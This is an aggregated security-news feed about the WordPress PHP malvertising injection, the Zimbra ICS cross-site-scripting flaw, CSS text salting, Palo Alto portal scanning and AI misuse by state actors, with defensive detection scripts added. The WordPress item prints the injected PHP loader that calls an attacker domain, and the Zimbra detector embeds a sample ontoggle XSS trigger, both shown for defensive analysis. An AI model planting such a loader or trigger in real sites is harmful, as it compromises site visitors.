• In an era where AI and SaaS applications underpin daily workflows, organizations face an unprecedented challenge: the invisible exfiltration of sensitive information. Traditional, file-based data loss prevention (DLP) measures were designed for attachments and downloads, but today’s risk landscape extends far beyond simple file movements. As employees increasingly rely on Generative AI tools and unmanaged […]

    The post 77% of Employees Share Company Secrets on ChatGPT Compromising Enterprise Policies appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • OpenAI announced it has banned a series of ChatGPT accounts linked to Chinese state-affiliated hacking groups that used the AI models to refine malware and create phishing content.

    The October 2025 report details the disruption of several malicious networks as part of the company’s ongoing commitment to preventing the abuse of its AI technologies by threat actors and authoritarian regimes.

    Since February 2024, OpenAI has disrupted over 40 networks that violated its usage policies. The company stated that it continues to see threat actors incorporate AI into existing strategies to increase speed and efficiency, rather than developing novel offensive capabilities with the models.

    China-Linked Actors Enhance Cyber Operations

    A key case study in the report focuses on a cluster of accounts that OpenAI named “Cyber Operation Phish and Scripts.” The accounts, operated by Chinese-speaking individuals, were used to assist in malware development and phishing campaigns.

    OpenAI’s investigation found that the group’s activities were consistent with cyber operations serving the intelligence requirements of the People’s Republic of China (PRC). The activity also overlapped with threat groups publicly tracked as UNK_DROPPITCH and UTA0388.

    These hackers used ChatGPT for two primary functions:

    • Malware Development: They used the AI to help develop and debug tooling, with implementation details overlapping with malware known as GOVERSHELL and HealthKick. The actors also researched further automation possibilities using other AI models like DeepSeek.
    • Phishing Content Generation: The group created targeted and culturally tailored phishing emails in multiple languages, including Chinese, English, and Japanese. Their targets included Taiwan’s semiconductor sector, U.S. academia, and organizations critical of the Chinese government.

    OpenAI noted that the actors used the models to gain “incremental efficiency,” such as crafting better phishing emails and shortening coding cycles, rather than creating new types of threats.

    The report also detailed the disruption of other accounts linked to Chinese government entities. These users attempted to employ ChatGPT for developing surveillance and profiling tools.

    One banned user sought help in drafting a proposal for a “High-Risk Uyghur-Related Inflow Warning Model,” designed to analyze travel bookings and police records.

    Another instance involved an attempt to design a “social media probe” capable of scanning platforms like X (formerly Twitter), Facebook, and Reddit for political, ethnic, and religious content deemed “extremist.”

    Other users were banned for using the AI to research critics of the Chinese government and identify the funding sources of accounts critical of the PRC.

    Mitigations

    In response to these findings, OpenAI disabled all accounts associated with the malicious activities and shared indicators of compromise with industry partners to aid in broader cybersecurity efforts.

    The report emphasizes that the models themselves often acted as a safety barrier, refusing direct requests for malicious code or working exploits. The actors were limited to “building-block” code snippets that were not inherently malicious on their own.

    OpenAI’s findings indicate that while state-sponsored actors are actively experimenting with AI, its primary use is to augment existing operations.

    The company stressed that it continues to invest in detecting and disrupting such abuses to prevent its tools from being used for malicious cyber activity, scams, and covert influence operations.


    The post OpenAI Banned ChatGPT Accounts Used by Chinese Hackers to Develop Malware appeared first on Cyber Security News.


  • In a groundbreaking disclosure, CloudSEK’s TRIAD unit has unearthed internal operational materials that shed light on Charming Kitten (APT35), revealing an intricate espionage apparatus linked to Iran’s Islamic Revolutionary Guard Corps (IRGC). The leak comprises over 100 Persian-language files marked with Jalali calendar dates and aligned with Tehran time, details CloudSEK cites in support of the material’s authenticity. At the apex, […]

    The post APT35: Inside the Structure, Toolset, and Espionage Operations of an IRGC-Linked Group appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • In a sophisticated evolution of email-based attacks, adversaries have begun leveraging Cascading Style Sheets (CSS) to inject hidden “salt” — irrelevant content used to confuse detection systems — deep within HTML emails. Cisco Talos’s year-long monitoring (March 1, 2024 – July 31, 2025) reveals a marked increase in the abuse of CSS properties to conceal […]
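    The practical counter to salting is to score only the text a recipient actually sees. The following is an added example, not Cisco Talos tooling: it drops subtrees that inline CSS hides (display:none, visibility:hidden, font-size:0, opacity:0, zero width/height, large negative offsets), the HTML hidden attribute, and <script>/<style> content, and returns the hidden text separately because its presence is itself a signal. The sample message and its domain are constructed; the example assumes styles are inline, since <style> blocks and external CSS are not resolved here.

```python
"""Strip CSS-hidden "salt" from an HTML email before text classification.

Added example, not Cisco Talos tooling. Walks the message with the standard
library HTML parser and buckets text into "visible" and "hidden". Assumption:
hiding styles are inline; <style> blocks and external CSS are not resolved, and
implicitly closed tags (an unclosed <p>) can skew the depth tracking.
"""
from __future__ import annotations

import re
from html.parser import HTMLParser

HIDING_RULES = [
    re.compile(r"display\s*:\s*none", re.I),
    re.compile(r"visibility\s*:\s*hidden", re.I),
    re.compile(r"font-size\s*:\s*0(?:px|pt|em|rem|%)?\s*(?:;|$)", re.I),
    re.compile(r"opacity\s*:\s*0(?:\.0+)?\s*(?:;|$)", re.I),
    re.compile(r"(?:max-)?(?:width|height)\s*:\s*0(?:px|em|rem|%)?\s*(?:;|$)", re.I),
    re.compile(r"(?:left|top|right|bottom|text-indent)\s*:\s*-\d{3,}", re.I),
]
VOID_TAGS = {"area", "base", "br", "col", "embed", "hr", "img", "input",
             "link", "meta", "source", "track", "wbr"}


def is_hidden(style: str) -> bool:
    """True if an inline style string matches any hiding rule."""
    return any(rule.search(style) for rule in HIDING_RULES)


class VisibleTextExtractor(HTMLParser):
    """Collect text nodes, splitting them into visible and hidden buckets."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.hidden_depth = 0          # > 0 while inside a hidden subtree
        self.visible_parts: list[str] = []
        self.hidden_parts: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag in VOID_TAGS:
            return                     # no end tag, so never touch the depth
        if self.hidden_depth:
            self.hidden_depth += 1     # nested inside an already hidden element
            return
        attr_map = dict(attrs)
        if (tag in ("script", "style") or "hidden" in attr_map
                or is_hidden(attr_map.get("style") or "")):
            self.hidden_depth = 1

    def handle_endtag(self, tag):
        if tag not in VOID_TAGS and self.hidden_depth:
            self.hidden_depth -= 1

    def handle_data(self, data):
        bucket = self.hidden_parts if self.hidden_depth else self.visible_parts
        bucket.append(data)


def split_visible_hidden(html: str) -> tuple[str, str]:
    """Return (visible text, hidden text), each whitespace-normalised."""
    parser = VisibleTextExtractor()
    parser.feed(html)
    parser.close()
    visible = " ".join("".join(parser.visible_parts).split())
    hidden = " ".join(" ".join(parser.hidden_parts).split())
    return visible, hidden


def visible_text(html: str) -> str:
    return split_visible_hidden(html)[0]


def hidden_text(html: str) -> str:
    return split_visible_hidden(html)[1]


# Constructed sample: a short lure padded with four kinds of hidden salt.
SAMPLE_EMAIL = """<html><body>
<p>Your account statement is <b>ready</b>.</p>
<span style="display:none">lorem ipsum dolor sit amet</span>
<div style="font-size:0px;color:#ffffff">unrelated weather report filler</div>
<p style="position:absolute;left:-9999px">more salt here</p>
<p>Sign in at <a href="https://login.example.invalid/">our portal</a> to review it.</p>
<div hidden>still more salt</div>
</body></html>
"""

if __name__ == "__main__":
    shown, salted = split_visible_hidden(SAMPLE_EMAIL)
    print("visible:", shown)
    print("hidden :", salted)
```

    Feed the visible string to the classifier and treat a large hidden-to-visible ratio as its own indicator; a legitimate newsletter rarely carries paragraphs of invisible text.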

    The post Hackers Exploit CSS Properties to Conceal Malicious Code in Hidden Text Salting Attacks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • WordPress websites have become a prime target for threat actors seeking to monetize traffic and compromise visitor security.

    In recent months, a new malvertising campaign has emerged, leveraging silent PHP code injections within theme files to serve unwanted third-party scripts.

    The attack blends seamlessly with legitimate site operations, delivering obfuscated JavaScript that redirects visitors, displays pop-ups, and evades security tools without raising suspicion.

    The intrusion was first noticed by a site owner who saw unexplained script loads; it originated from a small block of PHP code appended to the active theme’s functions.php file.

    This injection did not alter visible page content, instead executing behind the scenes on every request.

    Sucuri analysts identified the campaign after detecting anomalous JavaScript calls to attacker-controlled domains that multiple security vendors had already blocklisted.

    The attack primarily exploits weak file permissions and outdated themes. By gaining write access—often through compromised credentials or vulnerable plugins—hackers insert a seemingly benign function that contacts a command-and-control server.

    Once invoked via the wp_head hook, the function fetches a dynamic JavaScript payload and echoes it into the page’s <head> section, ensuring execution before the rest of the page loads.

    Sucuri researchers noted that the injected function issues an HTTP POST to a remote endpoint at hxxps://brazilc[.]com/ads.php, retrieves the returned script, and embeds it directly in the HTML document.

    The payload performs two main actions: loading a traffic-distribution script from porsasystem[.]com/6m9x.js and injecting a hidden 1×1 pixel iframe that mimics Cloudflare’s challenge platform.

    These techniques enable forced redirects, pop-ups, and evasion of security scanners by disguising malicious activity as legitimate CDN operations.

    Infection Mechanism

    The infection mechanism hinges on the following PHP function injected into functions.php:

    // Injected PHP function in functions.php
    function ti_custom_javascript() {
        $response = wp_remote_post(
            'https://brazilc.com/ads.php',
            array('timeout' => 15, 'body' => array('url' => home_url()))
        );
        if (!is_wp_error($response)) {
            echo wp_remote_retrieve_body($response);
        }
    }
    add_action('wp_head', 'ti_custom_javascript');

    Upon each page load, this function silently executes, contacting the C&C server and printing the returned JavaScript payload into the page header.

    Payload (Source – Sucuri)

    The attacker’s script then loads further malicious code asynchronously, using the data-cfasync='false' and async attributes so that Cloudflare Rocket Loader leaves the script alone and it executes immediately instead of being deferred or rewritten.

    Because the loader lives in functions.php and runs on every request, the infection persists until the injected code is removed; the hidden iframe, styled to resemble a Cloudflare challenge, keeps the redirect logic out of sight of visitors and casual inspection.
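    A cleanup sweep should look for the shape of this injection rather than for one domain, since the C&C endpoint changes between campaigns. The scanner below is an added example, not Sucuri’s tooling: it flags PHP that fetches a remote body and echoes it unescaped into a front-end hook such as wp_head, notes common obfuscation helpers, and lists the hard-coded URLs involved. The embedded samples are constructed (the C&C domain is a placeholder), and the matching is heuristic, so compare every hit against a pristine copy of the theme before deleting anything.

```python
"""Heuristic scan of WordPress theme/plugin PHP for remote-fetch-and-echo injections.

Added example, not Sucuri's tooling. Flags PHP that fetches a remote body and
echoes it into a front-end hook (wp_head, wp_footer, wp_body_open), plus the
usual obfuscation helpers. Patterns are heuristics, not signatures.
"""
from __future__ import annotations

import re
import sys
from pathlib import Path

REMOTE_FETCH = re.compile(
    r"\b(wp_remote_(?:post|get|request)|file_get_contents|curl_exec)\s*\(", re.I)
ECHO_REMOTE_BODY = re.compile(r"\b(?:echo|print)\s+wp_remote_retrieve_body\s*\(", re.I)
FRONTEND_HOOK = re.compile(
    r"add_action\s*\(\s*['\"](wp_head|wp_footer|wp_body_open)['\"]", re.I)
OBFUSCATION = re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13)\s*\(", re.I)
URL_LITERAL = re.compile(r"https?://[A-Za-z0-9.\-]+(?:/[^\s'\"]*)?", re.I)


def scan_source(src: str) -> list[str]:
    """Return human-readable findings for one PHP source string (empty list = clean)."""
    findings: list[str] = []
    fetch = REMOTE_FETCH.search(src)
    echo_body = ECHO_REMOTE_BODY.search(src)
    hook = FRONTEND_HOOK.search(src)
    if fetch and echo_body:
        where = f" into the '{hook.group(1)}' hook" if hook else ""
        findings.append(f"remote body from {fetch.group(1)}() echoed unescaped{where}")
    elif fetch and hook:
        findings.append(
            f"remote fetch {fetch.group(1)}() in a file that registers a '{hook.group(1)}' hook")
    for m in OBFUSCATION.finditer(src):
        findings.append(f"obfuscation helper {m.group(1)}()")
    if fetch:  # only worth listing URLs when something actually fetches them
        for url in sorted(set(URL_LITERAL.findall(src))):
            findings.append(f"hard-coded URL {url}")
    return findings


def scan_tree(root: Path) -> dict[str, list[str]]:
    """Scan every .php file under root (e.g. wp-content/themes); map path -> findings."""
    results: dict[str, list[str]] = {}
    for path in sorted(root.rglob("*.php")):
        findings = scan_source(path.read_text(encoding="utf-8", errors="replace"))
        if findings:
            results[str(path)] = findings
    return results


# Constructed sample mirroring the injection shape; the domain is a placeholder.
SAMPLE_INJECTED = """<?php
function ti_custom_javascript() {
    $response = wp_remote_post(
        'https://c2.example.invalid/ads.php',
        array('timeout' => 15, 'body' => array('url' => home_url()))
    );
    if (!is_wp_error($response)) {
        echo wp_remote_retrieve_body($response);
    }
}
add_action('wp_head', 'ti_custom_javascript');
"""

# Constructed benign theme code for comparison.
SAMPLE_CLEAN = """<?php
function mytheme_setup() { add_theme_support('title-tag'); }
add_action('after_setup_theme', 'mytheme_setup');
"""

if __name__ == "__main__":
    root = Path(sys.argv[1]) if len(sys.argv) > 1 else None
    hits = scan_tree(root) if root else {"<sample>": scan_source(SAMPLE_INJECTED)}
    for path, findings in hits.items():
        print(path)
        for finding in findings:
            print("  -", finding)
```

    Run it as `python scan.py /var/www/html/wp-content/themes`; with no argument it scans the embedded sample. Any hit in a theme you did not write, or that differs from the vendor’s copy of the same file, is worth a manual read.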


    The post Hackers Weaponizing WordPress Websites by Injecting Malicious PHP Codes Silently appeared first on Cyber Security News.


  • Cybersecurity researchers at GreyNoise have identified a dramatic escalation in malicious scanning activities targeting Palo Alto Networks PAN-OS GlobalProtect login portals, with attacks originating from over 2,200 unique IP addresses as of October 7, 2025. This represents a significant increase from the approximately 1,300 IPs initially observed on October 3, demonstrating the rapidly evolving nature […]

    The post Massive Attacks Targeting Palo Alto PAN-OS GlobalProtect Portals from 2,200 IPs appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • In 2025, account takeover (ATO) attacks remain one of the most critical cybersecurity risks facing businesses, especially in industries like e-commerce, banking, SaaS, and healthcare. Hackers continuously launch credential stuffing, phishing, and brute-force attacks, targeting user information to steal funds, gain unauthorized access, or cause reputational damage. Organizations cannot afford to overlook the importance of […]

    The post Top 10 Best Account Takeover Protection Tools in 2025 appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • CISA has issued a critical warning regarding a zero-day cross-site scripting (XSS) vulnerability in Synacor’s Zimbra Collaboration Suite (ZCS), designated as CVE-2025-27915.

    This vulnerability has been actively exploited in attacks and poses significant risks to organizations using the popular email and collaboration platform.

    Zimbra Collaboration Suite (ZCS) XSS Flaw

    The vulnerability exists within the Classic Web Client component of Zimbra Collaboration Suite and stems from insufficient sanitization of HTML content in ICS (iCalendar) files. 

    The security flaw is classified under CWE-79, which specifically addresses improper neutralization of input during web page generation.

    When users view email messages containing malicious ICS entries, embedded JavaScript code executes automatically through an ontoggle event handler on a <details> element. 

    This exploitation vector allows attackers to run arbitrary JavaScript code within the victim’s authenticated session context. 

    The attack slips past controls aimed at attachments and links because the payload rides inside legitimate calendar-file content that the web client renders as HTML.

    The vulnerability’s exploitation requires minimal user interaction – simply viewing a specially crafted email message triggers the malicious code execution. 

    This low barrier to exploitation makes it particularly dangerous for widespread attacks targeting multiple organizations simultaneously.
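    Until the vendor patch is applied everywhere, a mail gateway or an incident-response sweep over stored messages can look for the trigger itself. The following is an added example, not Zimbra code and no substitute for patching: it unfolds iCalendar content lines (RFC 5545 folding), reverses TEXT escaping, and flags text properties that carry an HTML tag with an inline event handler (the ontoggle-on-<details> shape described above), an inline <script>, or a javascript: URL. The sample calendar is constructed; the check is a heuristic, not a full HTML sanitizer.

```python
"""Triage check for active HTML smuggled inside iCalendar (ICS) text properties.

Added example; not Zimbra code and no substitute for the vendor patch. Unfolds
RFC 5545 content lines, reverses TEXT escaping and flags DESCRIPTION / SUMMARY /
LOCATION / COMMENT / X-ALT-DESC values carrying an inline event handler,
an inline <script> or a javascript: URL.
"""
from __future__ import annotations

import re

PROPS_OF_INTEREST = {"DESCRIPTION", "SUMMARY", "LOCATION", "COMMENT", "X-ALT-DESC"}
# An HTML start tag whose attribute list contains on<something>= (onload, ontoggle, ...).
EVENT_HANDLER = re.compile(r"<[a-z][^>]*\s(on[a-z]+)\s*=", re.I)
SCRIPT_OR_JS_URL = re.compile(r"<script\b|javascript\s*:", re.I)


def unfold(ics_text: str) -> list[str]:
    """Join folded lines: a line starting with SPACE or HTAB continues the previous one."""
    lines: list[str] = []
    for raw in ics_text.replace("\r\n", "\n").split("\n"):
        if raw[:1] in (" ", "\t") and lines:
            lines[-1] += raw[1:]
        elif raw:
            lines.append(raw)
    return lines


def split_property(line: str) -> tuple[str, str] | None:
    """Split 'NAME;PARAM="a:b":value' at the first colon outside double quotes."""
    in_quotes = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_quotes = not in_quotes
        elif ch == ":" and not in_quotes:
            return line[:i], line[i + 1:]
    return None


def unescape_text(value: str) -> str:
    """Reverse RFC 5545 TEXT escaping: backslash-n becomes a newline, any other
    backslash-escaped character becomes the character itself."""
    out: list[str] = []
    i = 0
    while i < len(value):
        if value[i] == "\\" and i + 1 < len(value):
            nxt = value[i + 1]
            out.append("\n" if nxt in "nN" else nxt)
            i += 2
        else:
            out.append(value[i])
            i += 1
    return "".join(out)


def find_suspicious_properties(ics_text: str) -> list[tuple[str, str]]:
    """Return (property name, trigger) pairs for properties that carry active HTML."""
    hits: list[tuple[str, str]] = []
    for line in unfold(ics_text):
        parts = split_property(line)
        if parts is None:
            continue
        name = parts[0].split(";", 1)[0].upper()  # drop parameters such as ;ALTREP=...
        if name not in PROPS_OF_INTEREST:
            continue
        text = unescape_text(parts[1])
        m = EVENT_HANDLER.search(text)
        if m:
            hits.append((name, m.group(1).lower()))
        elif SCRIPT_OR_JS_URL.search(text):
            hits.append((name, "script-or-javascript-url"))
    return hits


# Constructed sample: one benign event and one whose DESCRIPTION carries an
# ALTREP parameter with a quoted colon and is folded across two lines.
SAMPLE_ICS = (
    "BEGIN:VCALENDAR\r\n"
    "VERSION:2.0\r\n"
    "BEGIN:VEVENT\r\n"
    "UID:benign-1@example.invalid\r\n"
    "SUMMARY:Quarterly review\r\n"
    "DESCRIPTION:Agenda\\, slides attached. Meet in <b>room 4</b>.\r\n"
    "END:VEVENT\r\n"
    "BEGIN:VEVENT\r\n"
    "UID:crafted-1@example.invalid\r\n"
    "SUMMARY:Invoice\r\n"
    "DESCRIPTION;ALTREP=\"cid:part1.example\":Please confirm <details open ontoggle=\"al\r\n"
    " ert(document.domain)\">x</details> before Friday.\r\n"
    "END:VEVENT\r\n"
    "END:VCALENDAR\r\n"
)

if __name__ == "__main__":
    for prop, trigger in find_suspicious_properties(SAMPLE_ICS):
        print(f"suspicious {prop}: {trigger}")
```

    The unfolding step matters: a payload split across a folded line never matches a naive per-line grep, and the quoted-colon handling keeps ALTREP parameters from hiding the property name.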

    Risk Factors            Details
    Affected Products       Zimbra Collaboration Suite (ZCS) 10.1.9; ZCS 10.0.15; ZCS 9.0.0 Patch 46
    Impact                  Cross-site scripting
    Exploit Prerequisites   Victim must view a crafted email containing a malicious ICS calendar entry in the Classic Web Client; user interaction required; attacker needs a valid account or email delivery capability
    CVSS 3.1 Score          5.4 (Medium)


    Impact and Mitigations

    The successful exploitation of CVE-2025-27915 enables attackers to perform unauthorized actions within compromised user accounts, including the creation of malicious email filters that redirect incoming messages to attacker-controlled addresses. 

    This capability facilitates comprehensive data exfiltration and ongoing surveillance of victim communications.

    CISA has designated October 28, 2025, as the mandatory remediation deadline for federal agencies under Binding Operational Directive (BOD) 22-01. 

    Organizations must apply vendor-provided mitigations, implement applicable cloud service guidance, or discontinue product usage if effective mitigations remain unavailable.

    The agency emphasizes that this vulnerability’s active exploitation status requires immediate attention from all Zimbra Collaboration Suite administrators. 

    Security teams should monitor the official Zimbra Security Center and National Vulnerability Database for updated mitigation guidance and patches. 

    Organizations should also implement additional email security controls, including enhanced attachment scanning and user awareness training focused on suspicious calendar invitations and ICS file attachments.


    The post CISA Warns of Zimbra Collaboration Suite (ZCS) XSS Zero-Day Vulnerability Actively Exploited in Attacks appeared first on Cyber Security News.


  • GreyNoise has recorded a massive escalation in attacks targeting Palo Alto Networks PAN-OS GlobalProtect login portals, with over 2,200 unique IP addresses conducting reconnaissance operations as of October 7, 2025. 

    This represents a significant surge from the initial 1,300 IPs observed just days earlier, marking the highest scanning activity recorded in the past 90 days according to GreyNoise Intelligence monitoring.

    The reconnaissance campaign began with a sharp 500% increase in scanning activity on October 3, 2025, when researchers observed approximately 1,300 unique IP addresses probing Palo Alto login portals. 

    This initial surge already represented the largest burst of scanning activity in three months, with daily volumes previously rarely exceeding 200 IPs during the preceding 90-day period.

    2,200 IPs Scan Palo Portals (figure)

    Palo Alto PAN-OS GlobalProtect Login Portals Surge

    The escalating attack campaign demonstrates sophisticated coordination across geographically distributed infrastructure. 

    GreyNoise analysis reveals that 91% of the malicious IP addresses are geolocated to the United States, with additional clusters concentrated in the United Kingdom, the Netherlands, Canada, and Russia. 

    GreyNoise also found that roughly 12% of the subnets in AS11878 were taking part in the scanning of Palo login portals, indicating significant infrastructure commitment to this operation.

    The attack methodology suggests threat actors are systematically iterating through large credential databases, with login attempt patterns indicating automated brute-force operations against GlobalProtect SSL VPN portals. 

    Pace of Palo Alto unique login attempts (figure)

    GreyNoise has published a comprehensive dataset containing unique usernames and passwords from Palo login attempts observed during the past week, enabling security teams to assess potential credential exposure.

    Technical analysis reveals that 93% of participating IP addresses were classified as suspicious, while 7% received malicious designations. 

    1,285 Unique IPs probing Palo Alto login portals (figure)

    The scanning activity exhibits distinct regional clustering patterns with separate TCP fingerprints, suggesting multiple coordinated threat groups operating simultaneously.

    Security researchers have identified potential correlations between the Palo Alto scanning surge and concurrent reconnaissance operations targeting Cisco ASA devices.

    Both attack campaigns share dominant TCP fingerprints linked to infrastructure in the Netherlands, along with similar regional clustering behaviors and tooling characteristics.

    The cross-technology targeting suggests a broader reconnaissance campaign against enterprise remote access solutions. 

    Concurrent surges were observed across multiple remote access service platforms, though the exact relationship between these activities remains under investigation.

    The targeted nature of these attacks is evident from their focus on GreyNoise’s emulated Palo Alto profiles, including GlobalProtect and PAN-OS systems. 

    This precision indicates attackers likely derived target lists from public reconnaissance platforms such as Shodan or Censys, or conducted their own fingerprinting operations to identify vulnerable Palo Alto devices.

    Security teams should implement immediate defensive measures, including IP blocklisting of known malicious addresses, enhanced monitoring of GlobalProtect portal authentication logs, and implementation of additional access controls for remote VPN connections.
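    The “enhanced monitoring of GlobalProtect portal authentication logs” above amounts to two questions: has the number of distinct sources jumped against a baseline, and which sources are walking through usernames rather than mistyping one password? The script below is an added example, not GreyNoise’s pipeline and not a PAN-OS log parser; it assumes the portal’s authentication events have already been exported to a hypothetical normalised form, one line per attempt as "ISO-8601 timestamp,source IP,username,result", and answers both questions over a constructed sample of five quiet days followed by a spike.

```python
"""Surge and credential-iteration triage over VPN portal authentication events.

Added example, not GreyNoise's pipeline and not a PAN-OS log parser. Input is a
hypothetical normalised export: "timestamp,src_ip,username,result" per attempt.
(1) flags days whose distinct-source count exceeds a multiple of the median of
all earlier days; (2) lists sources that fail against many distinct usernames.
"""
from __future__ import annotations

from collections import defaultdict
from datetime import date
from statistics import median


def parse(lines: list[str]) -> list[tuple[date, str, str, str]]:
    """Parse normalised lines into (day, src_ip, username, result) tuples."""
    records = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, user, result = line.split(",", 3)
        records.append((date.fromisoformat(ts[:10]), src, user, result.strip().lower()))
    return records


def unique_sources_per_day(records) -> dict[date, int]:
    """Count distinct source IPs per calendar day, in date order."""
    per_day: dict[date, set[str]] = defaultdict(set)
    for day, src, _, _ in records:
        per_day[day].add(src)
    return {d: len(s) for d, s in sorted(per_day.items())}


def surge_days(records, factor: float = 5.0, min_baseline_days: int = 3):
    """Return (day, unique sources, baseline median) for days above factor x baseline."""
    flagged = []
    history: list[int] = []
    for day, n in unique_sources_per_day(records).items():
        if len(history) >= min_baseline_days and n > factor * median(history):
            flagged.append((day, n, median(history)))
        history.append(n)  # the baseline grows as quiet days accumulate
    return flagged


def credential_iterating_sources(records, min_users: int = 5):
    """Sources whose failed attempts span at least min_users distinct usernames.

    Returns (src_ip, distinct usernames, failed attempts), busiest first.
    """
    users: dict[str, set[str]] = defaultdict(set)
    failures: dict[str, int] = defaultdict(int)
    for _, src, user, result in records:
        if result != "success":
            users[src].add(user)
            failures[src] += 1
    rows = [(src, len(u), failures[src]) for src, u in users.items() if len(u) >= min_users]
    return sorted(rows, key=lambda r: (-r[1], -r[2], r[0]))


def constructed_sample() -> list[str]:
    """Constructed log lines: five quiet days, then a spike of 40 scanners."""
    lines = ["# timestamp,src_ip,username,result"]
    for d in range(1, 6):
        for i in range(3):      # the same three noisy sources every day
            lines.append(f"2025-10-0{d}T08:00:00Z,198.51.100.{i},admin,failure")
    for i in range(40):         # spike day: 40 sources, each walking six usernames
        for user in ("admin", "vpn", "test", "guest", "support", "sales"):
            lines.append(f"2025-10-06T09:{i:02d}:00Z,203.0.113.{i},{user},failure")
    lines.append("2025-10-06T10:00:00Z,192.0.2.7,alice,success")   # one real login
    return lines


if __name__ == "__main__":
    recs = parse(constructed_sample())
    for day, n, base in surge_days(recs):
        print(f"{day}: {n} unique sources vs baseline median {base}")
    for src, n_users, n_fail in credential_iterating_sources(recs)[:5]:
        print(f"{src}: {n_users} usernames, {n_fail} failures")
```

    The surge check deliberately uses a median rather than a mean so that one earlier spike does not inflate the baseline; feed it a longer history (the article’s 90-day window) for production use. Sources that appear in the iteration list are candidates for blocklisting, and the usernames they try are worth comparing against the GreyNoise credential dataset mentioned above.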


    The post Attacks on Palo Alto PAN-OS Global Protect Login Portals Surge from 2,200 IPs appeared first on Cyber Security News.


  • Brand protection has become a necessity for enterprises in 2025, with increasing risks of counterfeiting, phishing, domain abuse, fake social media accounts, and digital piracy. Businesses today must not only defend their intellectual property but also safeguard their digital presence to maintain customer trust and security. This article presents the top 10 best brand protection […]

    The post Top 10 Best Brand Protection Solutions for Enterprises in 2025 appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
